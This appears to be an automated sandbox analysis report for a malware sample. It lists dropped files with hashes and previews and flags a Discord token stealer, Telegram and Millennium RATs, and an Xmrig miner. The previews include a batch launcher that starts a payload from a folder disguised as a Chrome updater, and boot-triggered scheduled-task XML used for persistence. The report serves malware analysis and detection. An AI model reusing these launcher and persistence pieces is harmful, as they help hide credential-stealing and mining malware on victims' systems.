MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2bwc4beu.xc0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2lms4aim.ohw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3whzoc3r.euh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gxpcgmrx.zn2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2lirjbi.ra5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opxysbll.eav.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pr23fd10.n5q.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1deuurb.0mx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s4l2pjfb.w55.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmf4e3y2.lci.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxflzllm.uc3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat

Download File

Process:	C:\ProgramData\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	256
Entropy (8bit):	5.075305064813836
Encrypted:	false
SSDEEP:	6:QkEOTunIBdGKoQRw+HG9UwknaZ5MHPKw+Hs8E1wknaZ5MH6tuovn:QGT9OKjm9XrHMvk1EmrHMO
MD5:	D716653D9325A97C6B6CE4775020B5FC
SHA1:	90CA4C1938DFAA71C8818AC0ED94C5D48B0A77C5
SHA-256:	5A12EABD3F17A23FE3ADCD66CD156F04504CBA6BA548B62B93D5BF7A1E4BC269
SHA-512:	E8515741DA3C0956D7762CACD5729E8E9E633ADABB0BB2D00D5EA1AAB9C0944A04EACE48F5ED127525BCBE1F5F4C2BAC9EECEF380E9F5EC35F8E12FFEE0F92F0
Malicious:	false
Preview:	:l..Tasklist /fi "PID eq 5064" \| find ":"..if Errorlevel 1 (.. Timeout /T 1 /Nobreak.. Goto l..)..Cd "C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog"..Timeout /T 1 /Nobreak..Start "" "C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"..

C:\Users\user\AppData\Local\Temp\wpNXr.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	2190
Entropy (8bit):	7.9126550228540875
Encrypted:	false
SSDEEP:	48:L21NXRteW1ykYUggif/B9d7FdXW1sfaJyCyuSaUvrp4:L2HXRsW1yBUgp/jd7TXWT7STG
MD5:	C6A3611D353C828029A3B78F910F9945
SHA1:	45E658B6C7B3A0F0DAC4B16207C711FB69265820
SHA-256:	AC4EA65D6DFF20A4F114C6419F8212E7D3257CE18858124DD490E36CF6D8F68D
SHA-512:	325F50BDA2493B4F34F7B8DCC2DD539BD4BE63588987B8A2226617B1F99A321D2D1DA906CE8CACFB4CF98CA4216006D380F6C8A15E48B903CABAD069ECF8CC89
Malicious:	true
Preview:	Rar!......kP!.....A>.:W....^.....U....N.$....;z......{...a.....\....V..b.oQ.u.....g...N.....c.$..."..;..v.J...0.P.B..X.1[.:O...7-.tM....'.@.Mp.Te.A...E4...U..S...p...h!.s\..Iy.....@..i...e...5<>..=..."...].u....u./l4.......uk.....z....e/T.PjMo..^..\|......$.r..]cgs.U.g.7.#g......f..t,.e...,..pp.m...-..:.=..&I.u.._.......+.. !F.=,..o\..MY]]o..@...M.;..9t.D.09b...:.k3.P...5....^...[..).b.`.7...=..."...C.....n..=.b.{Z9.._g...vy.......n....~V...r.:E`IC,8...v'..;y7U...K\|.hE.[.O.gf....n...(.:q..w.o ....y(X3`...G8.....f_..u..p5.j..Z.]..i,O.5K..Cy.3.V.%.&..........Q.A.y....U.5.C.:~<...^..4....:rX..hz5c;.<.U...pun....!m...z.......}...bLQCW..n.}.s....sxBN.}1..6..3..w....p.v..S.9E#..2>A......q]Ri%5I....#.C^..v......X.exi.0C\1.T2.....P.[R2NNx.RF..G..=. .,...Cd.i.....4....+{zO._.r.r..%.@lf.G..%.c..J.y&.......5q\|{_^?..3y.T......B.T,.Z.\|].1d\n!.Y.V.ZK.c}U.!.0nc.^.7.......#@...).NIji#.l...S`.FF`../W.\.x.(.ZXJ....6.....\|.N...!'..../.g

C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp

Download File

Process:	C:\ProgramData\setup.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	161792
Entropy (8bit):	5.8318794599287465
Encrypted:	false
SSDEEP:	3072:lQbW78Kb89UMmY8MA1cRWr7BiKcOO1Sf7lHn4mr3yo4f8P2:lQK75bobwfBiKCYfhHLU5
MD5:	1667C96053EAA078109F8B0C9500FC9D
SHA1:	E0F567763BAAAA757F66F96951D9810F45F69F30
SHA-256:	F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
SHA-512:	6285ADE5CB85B71814EDD57EDDC512A031596043B7FCE4FCC909A0B78ECFE161C062AD0637EC82CBDAA36675AD32FBD0C94DDD96BB575BE8B1FBB47DF706AAE1
Malicious:	true
Preview:	MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$.......K...............D.......D...........o...9A......9A9.....9A......Rich............PE..d....t.d.........."....%.....X......X".........@..........................................`..................................................8.......p..`>...`..8....................5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......6..............@..@.rsrc...`>...p...@...8..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yntnomxcupkb.xml

Download File

Process:	C:\ProgramData\setup.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	5.1015990235428035
Encrypted:	false
SSDEEP:	24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
MD5:	546D67A48FF2BF7682CEA9FAC07B942E
SHA1:	A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
SHA-256:	EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
SHA-512:	10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl

C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe

Download File

Process:	C:\ProgramData\main.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5872344
Entropy (8bit):	7.487098820179109
Encrypted:	false
SSDEEP:	98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR65:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciN
MD5:	5DF3E2C717F267899F37EC6E8FC7F47A
SHA1:	5E980079F67215BF69B8C1C16B56F40BF4A29958
SHA-256:	E3F5C557ECE7EC27CB7E4A26482EADF0D9065065D94B2919F9B881BC74800E6E
SHA-512:	8CEF1184120E010421D69FCF271822B3F0B45E34A1565152A3F2DECB8F500D0E69DE9816D9075683FCFB0F431713F3FBC42AC2D87503CDCDDE125ABA3FA1635D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0...Y...........Y.. ........@.. ........................Z...........`.................................l.Y.O.....Y.@.....................Y.......Y.8............................................ ............... ..H............text....Y.. ....Y................. ..`.rsrc...@.....Y.......Y.............@..@.reloc........Y.......Y.............@..B..................Y.....H.........X.. ...............W..........................................(......(......{...."..}......F.{....o....s.......2...{....o..../..{.....o.....s,......(....,.(........2...{....o....2..{.....o.....{......o......s,...v..(....,.(.......{.....o....2.{....o.......2...{....o....2...{.....o.....{.....o....>.{.....o....&...0..k.......s......{.....{....o....o.....{....o.....+&..(.......(....,...o[...oW...+...oW.....(....-...........o......*.......(.3[......>..s

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul4tllZ:NllU4
MD5:	1F8AD5BD42EAAA119401D892686E8BEB
SHA1:	43DB0FA51B00EFD1E7B8A0960EFEE9F2E5E20C73
SHA-256:	1332CE95EEB24F8F94739946470E254AFD12FEAF6FC111E7DA4B11909E75E2C8
SHA-512:	4718815221B51FAB21E6F24856ACCDA8FD69C18795C94F286862C28810559D93439BE717DCF04492EBFEC23B3087D1CFA8649A6836EBAB8E96F85FFAD7CE35D6
Malicious:	false
Preview:	@...e................................................@..........

C:\Windows\Temp\__PSScriptPolicyTest_fjenar12.l0b.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_nmx0gcso.drv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_pknv2fm3.3vm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_yqpbi1fo.zom.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\gqxqtdeqxchk.sys

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Temp\wxyubnjmnlae.tmp

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5345280
Entropy (8bit):	6.701640724838757
Encrypted:	false
SSDEEP:	98304:LrZwo40cLwthpjCU5FLnFUWbU5y1vsdCXZe1bwCUoJXiN5rFkKYVd:Lra1Wbd1vs0JeaCVJX25GKYVd
MD5:	470F48122F70CD013CE039F8049F8906
SHA1:	673B6BE8163580BA70403321663F5EDBB0565F12
SHA-256:	B4B33DDBDD8953EE4BCAAA0F7B71468FAD1F5A7F8CFC7AFCF35810D2B1792D2A
SHA-512:	C44BA477DF1876D507FE24C54957BE6A92C2E7FA498103C49A74A34D6090FB2253DCAF81F36EAF82BB3AEEFCB8A414579EAD130B50523DB842C95299D76D6226
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: ditekSHen
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......=r.Yy...y...y...2k..p...2k......2k..o...llh.}...ll..j...ll......ll..u...y.......2k..`....c..*...O...;...O.......O...z...O.j.x...y...x...O...x...Richy...........................PE..d..../.d.........."....%..6...L.....DS3........@..........................................`.................................................T.M......`.......................p..\|.....J.......................J.(....J.@.............6.8............................text.....6.......6................. ..`.rdata........6.......6.............@..@.data...d,3...M.......M.............@....pdata................N.............@..@_RANDOMX..............P.............@..`_TEXT_CN.&.......(....P.............@..`_TEXT_CN.....0........P.............@..`_RDATA..\....P........Q.............@..@.rsrc........`........Q.............@..@.reloc..\|....p........Q.............@..B................................

C:\Windows\Temp\yntnomxcupkb.xml

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	5.1015990235428035
Encrypted:	false
SSDEEP:	24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
MD5:	546D67A48FF2BF7682CEA9FAC07B942E
SHA1:	A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
SHA-256:	EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
SHA-512:	10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.999682296143684
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TS-240605-Millenium1.exe
File size:	38'730'377 bytes
MD5:	4ce7dec7f0af15277eec727a9e20142e
SHA1:	5bae148e9a1865370d25d805439e60f057806a04
SHA256:	fccf2be42bab41f3d1f8bb7778765729cdf5ed10a0bd65871ba3bd2b827c2402
SHA512:	123fac8db9b2fea104fed3c57e304402bf1c02dbf1f19046f67ecadab67ed95af71ee8661e9d7b7b87a5b0cf092fa65fddc206d3557ada0b876ac00e6b2185b5
SSDEEP:	786432:xRaNrdmuVZJW4j1B6O7WfE1StERPeJSu/6jsdbOr4q:xR0rEuTJWSfbyfEItERPeguAsd
